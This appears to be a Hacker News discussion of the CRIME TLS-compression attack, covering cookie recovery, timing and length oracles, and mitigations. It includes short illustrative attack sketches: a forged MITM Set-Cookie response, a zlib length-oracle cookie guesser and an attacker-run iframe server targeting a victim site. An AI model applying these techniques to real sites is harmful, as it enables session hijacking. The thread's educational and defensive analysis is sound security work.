I guess this is actually an instance where those Hollywood "guess the password one character at a time" animations would make sense.
1. To know the format of cookies used for the web site you are targeting. Specifically, whatever cookie contains authentication.
3. Ability to monitor the SSL connection as it is transported across TCP.
Would have been fun if they called this the CPE1704TKS attack instead of CRIME: http://www.youtube.com/watch?v=NHWjlCaIrQo
Like AWS. (Cite: http://dl.acm.org/citation.cfm?id=1653687.)
 Lala people never send sensitive data over plain HTTP I'M NOT HEARING YOU.
I understand and agree with your comment about the secure flag, but if I understood ivanr's comment it doesn't apply.
As for manipulating cookies from the MITM perspective, here's one clunky way to do it: redirect the victim's browser to the plain-text version of the target web site, intercept that request, and set a new cookie (pretending to be the plain-text version of the target web site). The next request to the secure version of the target web site should contain the injected cookie. As tptacek mentioned in another comment, this approach would not work with a site that uses HTTP Strict Transport Security.
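For concreteness, the MITM's forged answer to that intercepted plain-text request might look something like this sketch (the domain, cookie name, and client_socket are all made up; the real attack would target whatever cookie the site keys authentication on):

    def answer_intercepted_request(client_socket):
        # client_socket: the victim's intercepted plain-text HTTP connection.
        # The response pretends to come from the target site and plants a
        # cookie for its domain, which the browser will then attach to later
        # HTTPS requests as well (absent the Secure flag / HSTS).
        forged = (
            b"HTTP/1.1 200 OK\r\n"
            b"Set-Cookie: sessionid=aaaaaaaaaaaaaaaa; Domain=.victim.example; Path=/\r\n"
            b"Content-Length: 0\r\n"
            b"\r\n"
        )
        client_socket.sendall(forged)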
I think all three comments in this little subthread might be saying the same thing. Go nerddom!
That one was not cracked one character at a time in series; portions in the middle were discovered sooner. But, yeah, it would have been a more appropriate, cooler name.
edit: tptacek is absolutely right; there isn't a way to defend against this in application code. All you can do is turn off TLS compression. This is NOT by any means the only approach, it's just the most obvious one.
Did you see the BEAST attack? Exactly one byte at a time: http://www.youtube.com/watch?v=BTqAIDVUvrU
You're right that the Hollywood "guess the password one character at a time" animation makes sense here. It also makes sense for timing-based attacks. I.e., if checking "AB" against the password takes longer than checking "A", you know the second character is B...
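A sketch of the difference, in Python (purely illustrative):

    import hmac

    def naive_check(guess, password):
        # bails out at the first mismatch, so a correct prefix takes
        # measurably longer to reject than a wrong first character
        if len(guess) != len(password):
            return False
        for g, p in zip(guess, password):
            if g != p:
                return False
        return True

    def constant_time_check(guess, password):
        # hmac.compare_digest takes time independent of where the inputs differ
        return hmac.compare_digest(guess, password)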
1. Attacker controls some parts of plaintext
2. Attacker's content is mixed with content attacker wants to discover
3. Attacker can make repeated trials against the same plaintext (not necessarily against the same ciphertext stream or key)
4. Defender compresses content on the fly
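When all four hold, the attacker only needs a length oracle. A toy illustration with zlib (the cookie value is made up; in the real attack the lengths are read off the wire rather than computed locally):

    import zlib

    SECRET = b"sessionid=d8e8fca2dc0f896f"   # the cookie, unknown to the attacker
    KNOWN_PREFIX = b"sessionid="             # condition 1: the format is known

    def record_length(attacker_bytes):
        # stand-in for the length of the encrypted record: compression runs
        # before encryption, and encryption preserves length
        return len(zlib.compress(attacker_bytes + SECRET))

    # guess the first unknown byte: the candidate that lets the secret
    # back-reference one more byte of the guess usually gives the shortest record
    sizes = {c: record_length(KNOWN_PREFIX + c.encode()) for c in "0123456789abcdef"}
    for c in sorted(sizes, key=sizes.get):
        print(c, sizes[c])   # 'd' should typically sort to the top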
There are probably other cryptosystems that have this flaw, but it's less inherent to TLS than it is to the HTTPS security model.
Variable time until some threshold number of repeat failures occurs (e.g. 3). After this, manipulate the comparison time in such a manner that someone attempting to do this sort of attack would come up with a dummy password. If they come up with said dummy password, alert the user of an attempted attack.
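If I'm reading this right, something like the following sketch (the threshold, the names, and the leaky-versus-constant-time split are my interpretation):

    import hmac, secrets

    FAIL_THRESHOLD = 3
    DECOY = secrets.token_hex(16)   # the dummy password the attacker is steered toward

    def check_password(supplied, real, fail_count, alert):
        if fail_count < FAIL_THRESHOLD:
            return supplied == real          # the ordinary, variable-time comparison
        if supplied == DECOY:
            alert()                          # someone followed the timing trail all the way
            return False
        # past the threshold, only the decoy comparison above leaks timing;
        # the real password is checked in constant time
        return hmac.compare_digest(supplied, real)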
So I suspect the attack there cannot work on TLS, and in fact the demo code posted in a comment attacks local zlib, not TLS.
I think the actual attack, if it's along these lines, involves getting the server to echo back your guess of the cookie, so that the cookie and your guess are both on the same stream. Perhaps with TRACE?
Edit: Wait, I am. That wouldn't work because it'd compress the repeated subsequences. D'oh.
At least we can still do compression at the HTTP (or other higher-level protocol) level. That gets us most of the benefit anyway.
What would be the procedure if you use bzip2 (which is based on Burrows-Wheeler transformation) compression?
I do a lot of experimentation with new compression techniques for web demos, and I recently implemented my own compression algo from scratch based around the same building blocks as bzip2. The variance I saw was just staggering; a tiny change in my source material would totally warp the output.
Seriously, we know how to build secure cryptographic protocols. Unfortunately, step #1 is "don't try to be backwards compatible with the horribly broken things people were doing in the 1990s".
(Reason: because encrypted data is [should be] indistinguishable from random data, and random data does not compress)
These days, even when we don't include cryptographic fingerprints (e.g., with the hash-and-encrypt construction C = E(M || H(M))), there's enough structure in compression format headers to allow an attacker to recognize if he has the right key... and he isn't going to be running a brute-force attack anyway.
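For example, gzip's two magic bytes already act as a key-confirmation oracle (trial_decrypt here is a placeholder, not a real API):

    def key_looks_right(ciphertext, key, trial_decrypt):
        # any recognizable structure in the plaintext, here the gzip magic
        # bytes 0x1f 0x8b, tells the attacker whether a trial key was right,
        # with no explicit integrity check needed
        return trial_decrypt(ciphertext, key)[:2] == b"\x1f\x8b"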
When authenticating messages, a receiver necessarily gains the ability to reject a message as invalid. Adaptive chosen plaintext attacks arise when this rejection ends up conveying more information than a simple Y/N. From the perspective of an attacker, the verifier becomes an oracle capable of answering, say, "how many bytes are valid?", leading to a sub-brute-force attack.
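A sketch of how such an oracle collapses the search (valid_prefix_len is a placeholder for whatever the flawed verifier leaks, whether via timing, error codes, or anything else):

    def recover(secret_len, valid_prefix_len):
        # valid_prefix_len(guess) -> number of leading bytes the verifier accepted;
        # a sound verifier would only ever answer yes or no
        recovered = b""
        for i in range(secret_len):
            for b in range(256):
                if valid_prefix_len(recovered + bytes([b])) > i:
                    recovered += bytes([b])
                    break
        return recovered
    # at most 256 * secret_len queries instead of 256 ** secret_len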
It's easy for me to believe that you've internalized "minimize data-dependent branches in crypto code" and thus wouldn't have designed a compressed encrypted transport.
It is very hard for me to believe that you would have spotted this flaw immediately had anyone pointed out to you that TLS supported compression.
There is well-regarded (though not by me) crypto advice recommending that people compress before encrypting, to destroy structure in the plaintext.
"... both the SSH and TLS protocols support an option for on-the-fly compression. Potential security implications of using compression algorithms are of practical importance to people designing systems that might use both compression
I'm not claiming that I'd have noticed this particular attack. I'm saying that having compression in a supposedly secure transport layer was an obviously bad idea even before it was clear how it could be exploited. I don't need to get into a car accident to know that driving at night with my car's headlights turned off is a bad idea.
There's a huge difference between compressing data and compressing an authentication channel. This is why compression should not be included in the secure channel -- it should be left up to the higher-level code to decide whether compression is (a) completely pointless or (b) going to leak information dangerously.
But compression in TLS is not a relic of the 1990s; it's something that looks to have gained its earliest adoption in SSL/TLS at about the same time as Elliptic Curve.
My issue here isn't that you're wrong; it's that I think this is an extremely clever attack that says something profound about designing cryptosystems, and I wouldn't want to see Thai's and Juliano's (or Pornin's, if he's "wrong" about the prediction) work minimized by a glib comment about TLS.
I guess by that point they had thrown in everything but the kitchen sink, and decided they might as well throw in the kitchen sink too.
> I wouldn't want to see Thai's and Juliano's (or Pornin's, if he's "wrong" about the prediction) work minimized by a glib comment about TLS.
Oh, of course. I'm just irritated (as usual) by the fact that people continue to use SSL/TLS "because it's the standard" despite the fact that it's a phenomenally broken standard. There are places where you can't avoid it (HTTPS), but where it can be avoided...
My perspective on HTTPS/TLS is that it has a history of vulnerabilities because it is the most carefully studied cryptosystem in human history.
I'll agree to disagree with you on this.
Your perspective is... I'm not quite sure, actually. Maybe you just don't believe in mathematical proofs?
As you say, agree to disagree -- but I'm not going to stop pointing and laughing every time a new SSL/TLS vulnerability comes out. :-)
There's a reason why I don't drink -- type 1 diabetes and large quantities of alcohol don't interoperate well.
I work in an area where bugs are very scary, so we use formal verification, and that's on top of having many more testers than developers.
From the perspective of this naive outsider, I would have expected FV to be worth it for security-sensitive protocols. Is it that the protocols are too complex to be verified, or is it just not considered to be worth the effort?
Colin is right that we know how to prove that cryptographic systems have certain security properties. The academic literature is filled with laments about TLS and proofs of fixed versions of it.
Also, how does one compare a cryptographic hash function core to an entire cryptographic protocol to produce a statement about the fallibility of crypto design?
(Even if HTTP probably just got lucky here rather than deliberately making the right choice, it's still the only layer that had the chance to make the right choice).
Compression before encryption is not a problem if the sender is the only person who decides what is in the message to be sent. Compression doesn't make it vulnerable to chosen-plaintext attacks either. Mixing the victim's and the attacker's data before compression and encryption will leak data, yes.
In theory, protocols which fall to attacks when attackers have control of some of the message are said to be vulnerable to "chosen plaintext attacks" (if the attacker only gets 1 shot per message) or "adaptive chosen plaintext attacks" (if the attacker gets many bites at the same apple). Sound protocols don't have feasible adaptive chosen plaintext attacks.
In practice, most protocols can be coerced into carrying some data controlled by attackers. Sneaking some attacker-controlled data into a message is a very low bar for an attacker to clear.
A conceptual purist like Colin Percival would argue, correctly, that if there's an attack against a cryptosystem that benefits from knowing the distribution of bytes in the plaintext, that's a damning statement about the cryptosystem itself.
But compression does "break" some exploits.
I've studied cryptography theory, and I've implemented various ciphers and attacks, and the more I learn the more certain I become that I would never, ever use any of my own crypto code in production.
Data compression is often used in data storage or transmission. Suppose you want to use data compression in conjunction with encryption. Does it make more sense to
A. Compress the data and then encrypt the result, or
B. Encrypt the data and then compress the result.
Now we know the correct answer is Neither.
For a confusing example of a fairly leaky cryptosystem involving compression that works well in practice and has a proof of security that is aware of the leak, see Douceur et al.'s "convergent encryption".
Disabling compression could certainly contribute to global warming in a relatively small way...
GET / HTTP/1.0
X-Pad: GET / HTTP/aaaaaaa
You could argue that given enough samples the noise could be filtered and the attack still remains, but the same could be said for many successful patches over the years (TCP sequence number randomization, Kaminsky's DNS issue, etc.), and the number of samples required would be pretty infeasible.
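For what it's worth, one simple way to add that kind of noise (not necessarily what the parent had in mind; the header name and length range are arbitrary) is an incompressible, random-length padding header on every request:

    import secrets

    def padding_header():
        # random bytes don't compress, and the random length keeps the
        # compressed record length from tracking the attacker's guess
        # byte-for-byte; enough samples could still average it out
        return "X-Pad: " + secrets.token_hex(secrets.randbelow(32) + 8)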
Even if you don't have direct access to the library code creating SSL objects, there are still some tricks with ctypes, ffi, dlopen that have the same effect.
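In Python specifically, if you can get at the context at all it's a single flag (this assumes a reasonably recent ssl module and OpenSSL); the ctypes/dlopen route is only for when a library buries the context where you can't reach it:

    import ssl

    ctx = ssl.create_default_context()
    ctx.options |= ssl.OP_NO_COMPRESSION   # turn off TLS-level compression for this context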
It might even work with JavaScript turned off. Have a page with nested iframes. Serve each one from a different IP address and have the server not answer right away. The server answers with the first iframe having a chosen URL while Eve snoops the wire. Eve tells the server which URL to use for the next iframe body that it sends. Repeat until the cookie is deduced. The server can use a nested tree of iframes to avoid having a bazillion iframes in the top-level document.
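A very rough sketch of the attacker-run frame server described above (host names and port are made up, and the coordination with Eve is stubbed out):

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def next_guess():
        return "sessionid=a"   # placeholder: in the real attack Eve's measurements drive this

    class FrameServer(BaseHTTPRequestHandler):
        def do_GET(self):
            # each response embeds one iframe pointed at the target site with
            # the current guess in the URL; the browser attaches the real
            # cookie, and Eve measures the compressed record on the wire
            body = '<iframe src="https://victim.example/?%s"></iframe>' % next_guess()
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body.encode())

    HTTPServer(("", 8080), FrameServer).serve_forever()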
If not, we’ll urgently need a way for site devs to whitelist precomputed (and thus immune) static assets for compression.
Compression: Specifies whether compression is allowed, or delayed until the user has authenticated successfully. The argument must be "yes", "delayed", or "no". The default is "delayed".
I don't know why they chose "delayed" as default, but this seems to prevent this attack.
So, not so much.